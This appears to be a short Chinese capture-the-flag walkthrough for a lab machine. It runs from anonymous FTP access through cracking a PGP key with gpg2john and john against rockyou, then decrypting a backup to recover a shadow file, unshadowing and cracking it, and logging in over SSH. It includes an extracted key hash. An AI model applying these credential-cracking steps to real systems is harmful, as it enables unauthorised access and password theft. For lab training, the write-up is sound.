ftp直接拿user.txt

gpg2john private.asc > hash


cat hash       
anonforce:$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968:::anonforce <melodias@anonforce.nsa>::private.asc

john --wordlist=/usr/share/wordlists/rockyou.txt hash

gpg --import private.asc
//导入
gpg --decrypt backup.pgp

输入破解得到的密码

得到shadow文件

unshadow passwd shadow.txt > unshadowed.txt

来爆破john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

然后ssh就行了,问题出在echo shadow的时候$被解释了

另外补充
其中{加密后的口令密码}的格式为\$id\$salt\$encrypted

id为1时,采用md5算法加密
id为5时,采用SHA256算法加密
id为6时,采用SHA512算法加密
salt为盐值,是对密码进行hash的一个干扰值
encrypted为散列值